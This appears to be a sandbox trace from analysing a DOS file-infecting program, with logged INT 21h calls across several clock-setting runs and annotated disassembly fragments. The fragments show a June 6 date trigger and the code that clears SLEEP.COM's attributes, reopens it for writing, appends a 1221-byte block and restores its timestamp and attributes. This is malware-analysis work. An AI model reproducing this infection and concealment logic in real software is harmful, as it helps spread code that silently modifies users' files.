2018-12-25T12:03:28.803426731Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.810818928Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.819819132Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.822464897Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.83419371Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.836959295Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.844768195Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.848232106Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.852012949Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.855287034Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.857805029Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.868502035Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.870794353Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.879669981Z 67 PC: 12d4a | Get or set file attributes (See above)
; Code at the return address of the Get date call (INT 21h AH=2Ah returns DH = month, DL = day).
; Execution leaves this listing at one of the two jmp instructions; the lines after 0x12b69 are a
; linear sweep of the bytes that follow. A date-gated branch is only exercised when the analysis
; clock is set to the matching day, so a single run does not show it.
2018-12-25T12:03:28.891055628Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606  ; DX == 0x0606 means month 6, day 6
0x12b64: je 0x12b69  ; date matches: go on to 0x12d4f (not shown; presumably the date-triggered routine)
0x12b66: jmp 0x12dba  ; any other date: continue at 0x12dba; the next logged call is at PC 12dc5, so this run took this path
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh  ; NOTE(review): 0x12b6c-0x12b77 is probably data decoded as instructions
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl  ; bytes 00 55 8B, with EC below: also readable as a data byte, then push bp / mov bp, sp
0x12b77: in al, dx
0x12b78: sub sp, 0x2c  ; reserve 0x2c bytes of stack locals
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b80: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b83: int 0x21
0x12b85: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b87: mov cx, 0x10  ; attribute mask 0x10 includes directories in the search
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]  ; DS:DX = 0x1aa + word at [0x106], the search pattern (string not shown)
2018-12-25T12:03:28.894908792Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.900025515Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC (return address after the int 0x21) | Syscall Name
2018-12-25T12:03:28.128708015Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.13287615Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.137377755Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.138862262Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.146670702Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.153197608Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of the Get time call (INT 21h AH=2Ch returns DH = seconds, DL = hundredths).
; It derives a byte from the clock, then clears the target file's attributes and reopens it read/write,
; which is the step before the file writes logged next.
2018-12-25T12:03:28.160718537Z 44 PC: 12cae | Get time 0x12cae: add dl, dh  ; dl = hundredths + seconds
0x12cb0: je 0x12caa  ; sum is zero: branch back to 0x12caa (before this excerpt; presumably retries the time call)
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]  ; si = 0x115 + word at [0x106]; NOTE(review): looks like a relocation base, confirm
0x12cb9: mov byte ptr [si], dl  ; store the clock-derived byte; NOTE(review): presumably a per-copy key or marker, its consumer is not shown
0x12cbb: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12cbe: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc  ; DS:DX = si + 0xbc, the path argument of the call
0x12cc6: int 0x21  ; logged as op 67 at PC 12cc8 (the logged PC is the address after the int)
0x12cc8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX (BX is set outside this excerpt)
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02  ; AH=3Dh open, AL=02h read/write access
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6  ; carry clear: the open succeeded
0x12cd3: jmp 0x12c52  ; open failed: leave this path (target not shown)
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x62]
0x12cdd: xchg ax, bx  ; BX = handle for the calls that follow
2018-12-25T12:03:28.163807782Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.180886487Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.182888414Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.190378831Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.192773051Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.195491023Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.197332377Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.198851145Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.20507867Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.206327778Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.21194643Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.222026471Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.224967343Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.232713121Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.239238479Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.24158344Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.258165461Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.260039035Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.271353013Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.279134522Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.282121749Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.284767446Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.287096959Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.296530156Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.298388364Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.306371524Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.317120231Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.320066613Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.326793459Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.333759436Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.336070164Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.346639589Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.349463769Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.356104219Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.358762152Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.362252882Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.365036364Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.36710834Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.377264144Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.379082023Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.386553081Z 67 PC: 12d4a | Get or set file attributes (See above)
; Code at the return address of the Get date call (INT 21h AH=2Ah returns DH = month, DL = day).
; Execution leaves this listing at one of the two jmp instructions; the lines after 0x12b69 are a
; linear sweep of the bytes that follow. A date-gated branch is only exercised when the analysis
; clock is set to the matching day, so a single run does not show it.
2018-12-25T12:03:28.397163297Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606  ; DX == 0x0606 means month 6, day 6
0x12b64: je 0x12b69  ; date matches: go on to 0x12d4f (not shown; presumably the date-triggered routine)
0x12b66: jmp 0x12dba  ; any other date: continue at 0x12dba; the next logged call is at PC 12dc5, so this run took this path
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh  ; NOTE(review): 0x12b6c-0x12b77 is probably data decoded as instructions
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl  ; bytes 00 55 8B, with EC below: also readable as a data byte, then push bp / mov bp, sp
0x12b77: in al, dx
0x12b78: sub sp, 0x2c  ; reserve 0x2c bytes of stack locals
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b80: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b83: int 0x21
0x12b85: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b87: mov cx, 0x10  ; attribute mask 0x10 includes directories in the search
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]  ; DS:DX = 0x1aa + word at [0x106], the search pattern (string not shown)
2018-12-25T12:03:28.399385631Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.403244889Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC (return address after the int 0x21) | Syscall Name
2018-12-25T12:03:28.223225902Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.22826661Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.230926006Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.231740222Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.238933695Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.246516507Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of the Get time call (INT 21h AH=2Ch returns DH = seconds, DL = hundredths).
; It derives a byte from the clock, then clears the target file's attributes and reopens it read/write,
; which is the step before the file writes logged next.
2018-12-25T12:03:28.250424114Z 44 PC: 12cae | Get time 0x12cae: add dl, dh  ; dl = hundredths + seconds
0x12cb0: je 0x12caa  ; sum is zero: branch back to 0x12caa (before this excerpt; presumably retries the time call)
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]  ; si = 0x115 + word at [0x106]; NOTE(review): looks like a relocation base, confirm
0x12cb9: mov byte ptr [si], dl  ; store the clock-derived byte; NOTE(review): presumably a per-copy key or marker, its consumer is not shown
0x12cbb: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12cbe: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc  ; DS:DX = si + 0xbc, the path argument of the call
0x12cc6: int 0x21  ; logged as op 67 at PC 12cc8 (the logged PC is the address after the int)
0x12cc8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX (BX is set outside this excerpt)
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02  ; AH=3Dh open, AL=02h read/write access
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6  ; carry clear: the open succeeded
0x12cd3: jmp 0x12c52  ; open failed: leave this path (target not shown)
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x62]
0x12cdd: xchg ax, bx  ; BX = handle for the calls that follow
2018-12-25T12:03:28.252237051Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.264051131Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.265195246Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.269265455Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.271161501Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.272709713Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.274253214Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.275656482Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.281472995Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.282439594Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.289508141Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.299374764Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.301949933Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.313598703Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.320178895Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.322162922Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.332458597Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.33429096Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.341150103Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.344531865Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.347504141Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.350368907Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.353092228Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.368451533Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.370276909Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.378509333Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.395555843Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.398623315Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.404892087Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.408971134Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.410428406Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.417025152Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.418466896Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.422533871Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.425558487Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.427720218Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.429448781Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.4309046Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.436851039Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.437966344Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.443448654Z 67 PC: 12d4a | Get or set file attributes (See above)
; Code at the return address of the Get date call (INT 21h AH=2Ah returns DH = month, DL = day).
; Execution leaves this listing at one of the two jmp instructions; the lines after 0x12b69 are a
; linear sweep of the bytes that follow. A date-gated branch is only exercised when the analysis
; clock is set to the matching day, so a single run does not show it.
2018-12-25T12:03:28.452253449Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606  ; DX == 0x0606 means month 6, day 6
0x12b64: je 0x12b69  ; date matches: go on to 0x12d4f (not shown; presumably the date-triggered routine)
0x12b66: jmp 0x12dba  ; any other date: continue at 0x12dba; the next logged call is at PC 12dc5, so this run took this path
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh  ; NOTE(review): 0x12b6c-0x12b77 is probably data decoded as instructions
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl  ; bytes 00 55 8B, with EC below: also readable as a data byte, then push bp / mov bp, sp
0x12b77: in al, dx
0x12b78: sub sp, 0x2c  ; reserve 0x2c bytes of stack locals
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b80: lea dx, word ptr [bp - 0x2c]  ; DTA = the 0x2c-byte stack buffer
0x12b83: int 0x21
0x12b85: mov ah, 0x4e  ; AH=4Eh: find first file
0x12b87: mov cx, 0x10  ; attribute mask 0x10 includes directories in the search
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]  ; DS:DX = 0x1aa + word at [0x106], the search pattern (string not shown)
2018-12-25T12:03:28.453918132Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.456948912Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC (return address after the int 0x21) | Syscall Name
2018-12-25T12:03:28.343368279Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.346930099Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.351314885Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.352393202Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.359017383Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.366415799Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of the Get time call (INT 21h AH=2Ch returns DH = seconds, DL = hundredths).
; It derives a byte from the clock, then clears the target file's attributes and reopens it read/write,
; which is the step before the file writes logged next.
2018-12-25T12:03:28.373178749Z 44 PC: 12cae | Get time 0x12cae: add dl, dh  ; dl = hundredths + seconds
0x12cb0: je 0x12caa  ; sum is zero: branch back to 0x12caa (before this excerpt; presumably retries the time call)
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]  ; si = 0x115 + word at [0x106]; NOTE(review): looks like a relocation base, confirm
0x12cb9: mov byte ptr [si], dl  ; store the clock-derived byte; NOTE(review): presumably a per-copy key or marker, its consumer is not shown
0x12cbb: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12cbe: xor cx, cx  ; CX = 0 clears every attribute, read-only included
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc  ; DS:DX = si + 0xbc, the path argument of the call
0x12cc6: int 0x21  ; logged as op 67 at PC 12cc8 (the logged PC is the address after the int)
0x12cc8: mov ah, 0x3e  ; AH=3Eh: close the handle in BX (BX is set outside this excerpt)
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02  ; AH=3Dh open, AL=02h read/write access
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6  ; carry clear: the open succeeded
0x12cd3: jmp 0x12c52  ; open failed: leave this path (target not shown)
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x62]
0x12cdd: xchg ax, bx  ; BX = handle for the calls that follow
2018-12-25T12:03:28.375386726Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.62792985Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.630222258Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.643950272Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.653118913Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.656461117Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.659991584Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.663897776Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.674846591Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.67701963Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.687170069Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.699408365Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.702257993Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.716382681Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.723724867Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.726234128Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.737537058Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.739852513Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.759217416Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.763585482Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.77675673Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.778974026Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.780659088Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.790248148Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.792126817Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.80117108Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.813017374Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.816155855Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.823342183Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.832165687Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.83693021Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.849139751Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.852422923Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.860684112Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.864203773Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.867953607Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.872320759Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.874783125Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.88594189Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.88922438Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.898282521Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.910735607Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
; Dump following the "Get date" call logged on the line above (INT 21h AH=2Ah returns
; DH = month, DL = day), where `cmp dx, 0x606` tests for month 6, day 6. A match goes
; to 0x12d4f (not shown); any other date goes to 0x12dba. In this trace the
; non-matching path ran - the next logged calls are the "Change current directory"
; entries at PC 12dc5 and 12dcd - so the code at 0x12d4f was not exercised by this run.
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
; NOTE(review): execution does not continue past the unconditional jump above; the
; rest is the bytes that follow in memory, decoded linearly. 0x12b6c-0x12b74 look like
; data read as instructions, and the decode is out of step with the real code:
; `add byte ptr [di - 0x75], dl` encodes as 00 55 8B and `in al, dx` as EC, so a
; `push bp` / `mov bp, sp` prologue probably starts at 0x12b75 - confirm against the bytes.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2c bytes of stack, save SI, and continue at 0x12bed (not shown).
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
; INT 21h AH=1Ah: set the disk transfer address to the buffer at [bp - 0x2c].
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; Set-up for INT 21h AH=4Eh (find first) with attribute mask CX=0x10, which includes
; directory entries; the search pattern is at 0x1aa + word at [0x106]. The INT itself
; lies past the end of this dump.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.914506014Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.920093892Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.385564818Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.389160891Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.393465611Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.394507344Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.401314448Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.40875106Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.415876264Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
; Dump taken at the PC where the "Get time" call logged on the line above returned
; (INT 21h AH=2Ch: DH = seconds, DL = hundredths); `add dl, dh` has just summed the two.
; A zero sum branches back to 0x12caa, presumably to ask for the time again, so the
; byte stored below is never 0.
0x12cb0: je 0x12caa
; si = 0x115 + word at [0x106]; [0x106] looks like a base the code adds to its own
; data offsets (TODO confirm). The time-derived byte is stored there; what it is
; used for is not visible in this fragment.
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
; INT 21h AX=4301h with CX=0: set the attributes of the path at DX = si + 0xbc to
; none, which removes read-only. Logged as "Get or set file attributes", PC 12cc8.
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
; INT 21h AH=3Eh: close the handle in BX (presumably the one opened at PC 12c31).
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
; INT 21h AX=3D02h: open for read/write; DX is not reloaded, so it is the same path.
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
; Carry clear means the open succeeded; otherwise leave through 0x12c52 (not shown).
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
; Save the new handle (AX) at es:[dx + 0x62], then move it into BX, where the
; write calls logged next expect it.
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.4183215Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.635629625Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.638500211Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.646470926Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.658123902Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.660948602Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.663825123Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.666438371Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.680289221Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.686848237Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.696596295Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.708900769Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.712474495Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.722275109Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.731041103Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.733801681Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.747836352Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.750280106Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.758284695Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.762185287Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.767504734Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.770863102Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.773435861Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.785754776Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.787923842Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.797255124Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.818941178Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.822320567Z 61 PC: 12c31 | Open file (See above)
